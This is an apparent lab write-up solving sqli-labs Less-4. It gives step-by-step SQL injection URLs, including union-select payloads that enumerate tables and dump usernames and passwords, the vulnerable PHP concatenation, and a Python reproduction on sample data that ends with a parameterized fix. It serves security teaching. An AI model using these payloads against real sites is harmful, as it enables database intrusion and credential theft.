http://sqlilabs/Less-4/?id=1
Normal output.
http://sqlilabs/Less-4/?id=1'
Normal output (the single quote does not break the query).
http://sqlilabs/Less-4/?id=1"
Error output.
The error message shows that the injection point is also wrapped in parentheses, so the closing pattern is `")`:
http://sqlilabs/Less-4/?id=1")--+
Normal output.
Next comes the usual routine (the earlier copy of these URLs pointed at Less-1; they belong to Less-4, as the `")` closing shows):
http://sqlilabs/Less-4/?id=1") order by 3--+
http://sqlilabs/Less-4/?id=1") order by 4--+
http://sqlilabs/Less-4/?id=-1") union select 1,2,3--+
http://sqlilabs/Less-4/?id=-1") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+
http://sqlilabs/Less-4/?id=-1") union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' and table_schema=database()--+
http://sqlilabs/Less-4/?id=-1") union select 1,2,(select group_concat(username,0x3a,password) from users) users--+
Apart from that, it can also be done in one step (always-true condition; the second form closes the quote and parenthesis itself instead of commenting the rest out):
http://sqlilabs/Less-4/?id=1") or 1=1--+
http://sqlilabs/Less-4/?id=1") or "1"=("1
In the source code, id is first wrapped in double quotes and then placed inside parentheses when the SQL statement is built:
$id = '"' . $id . '"';
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";
and id is not filtered at all, which is why `")` closes the context and a comment sequence discards the trailing `") LIMIT 0,1`.
:D
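The following is an added example, not part of the original write-up or of sqli-labs. It reproduces the two PHP lines above in Python, shows what the server actually receives for each probe from the write-up, and runs the payloads against an in-memory SQLite table filled with constructed sample rows (not the lab's real data). Two adaptations are assumptions for SQLite: MySQL's three-argument `group_concat(username,0x3a,password)` becomes `group_concat(username||':'||password)`, and the `id=1'` probe is not executed because MySQL silently casts `"1'"` to 1 while SQLite does not. The parameterized function at the end is the fix, added for contrast.

```python
import sqlite3

# Constructed sample data standing in for the lab's users table.
SAMPLE_USERS = [
    (1, "Dumb", "Dumb"),
    (2, "Angelina", "I-kill-you"),
    (3, "Dummy", "p@ssword"),
]

# The last payload from the write-up, with group_concat adapted to SQLite (assumption).
UNION_DUMP = (
    '-1") union select 1,2,'
    "(select group_concat(username||':'||password) from users) users--+"
)


def build_less4_query(user_id: str) -> str:
    """Mirror the Less-4 PHP: wrap id in double quotes, then put it inside
    parentheses. Nothing is escaped, so the caller controls the SQL text."""
    user_id = '"' + user_id + '"'
    return f"SELECT * FROM users WHERE id=({user_id}) LIMIT 0,1"


def _fresh_db() -> sqlite3.Connection:
    """In-memory SQLite database with the constructed users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?,?,?)", SAMPLE_USERS)
    return conn


def run_vulnerable(user_id: str):
    """Execute the concatenated query exactly as built. Returns the rows, or
    an 'ERROR: ...' string when an unbalanced quote breaks the syntax (this is
    the 'error output' the write-up sees for id=1")."""
    conn = _fresh_db()
    try:
        return conn.execute(build_less4_query(user_id)).fetchall()
    except sqlite3.Error as exc:
        return f"ERROR: {exc}"


def run_parameterized(user_id: str):
    """The fix: id travels as a bound parameter, so quotes, parentheses and
    comment sequences inside it are data and never reach the SQL parser."""
    conn = _fresh_db()
    return conn.execute(
        "SELECT * FROM users WHERE id=? LIMIT 0,1", (user_id,)
    ).fetchall()


if __name__ == "__main__":
    # What the server sees for each probe from the write-up.
    for probe in ("1", "1'", '1"', '1")--+', '1") or 1=1--+', UNION_DUMP):
        print(f"{probe!r:>40} -> {build_less4_query(probe)}")
    print("vulnerable, id=1      :", run_vulnerable("1"))
    print('vulnerable, id=1"     :', run_vulnerable('1"'))
    print("vulnerable, or 1=1--+ :", run_vulnerable('1") or 1=1--+'))
    print("vulnerable, union dump:", run_vulnerable(UNION_DUMP))
    print("parameterized, dump   :", run_parameterized(UNION_DUMP))
```

Note how `1") or 1=1--+` returns every row: the comment removes the trailing `") LIMIT 0,1`, so the `LIMIT 0,1` that normally restricts the page to one record is gone as well, which is why the union payloads can carry a whole `group_concat` in a single row.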